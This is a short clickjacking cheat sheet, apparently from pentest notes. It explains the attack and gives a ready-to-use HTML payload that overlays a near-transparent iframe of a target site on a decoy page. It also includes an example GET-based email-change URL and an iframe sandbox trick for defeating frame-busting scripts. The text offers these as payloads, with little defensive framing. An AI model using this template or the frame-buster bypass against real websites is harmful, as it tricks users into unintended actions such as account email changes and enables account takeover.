Clickjacking

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website. Clickjacking attacks are not mitigated by the CSRF token as a target session is established with content loaded from an authentic website and with all requests happening on-domain. Clickjacking attacks are possible whenever websites can be framed.

Payload

Use Burp Clickbandit.

The attacker incorporates the target website as an iframe layer overlaid on the decoy website.

<head>
	<style>
		#target_website {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
			}
		#decoy_website {
			position:absolute;
			top:300px;
			left:400px;
			z-index:1;
			}
	</style>
</head>
<body>
	<div id="decoy_website">
	Click me (...decoy web content here...)
	</div>
	<iframe id="target_website" src="https://vulnerable-website.com">
	</iframe>
</body>

Note that it is also possible to exploit the compilation of form fields if they can be set with arguments from GET.

https://target_website/change_email?email=test@test.com

Frame Busting Bypassing

A common client-side protection enacted through the web browser is to use frame busting or frame breaking scripts. These can be implemented via proprietary browser JavaScript add-ons or extensions such as NoScript.

An effective attacker workaround against frame busters is to use the HTML5 iframe sandbox attribute. When this is set with the allow-forms or allow-scripts values and the allow-top-navigation value is omitted then the frame buster script can be neutralized as the iframe cannot check whether or not it is the top window

<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms"></iframe>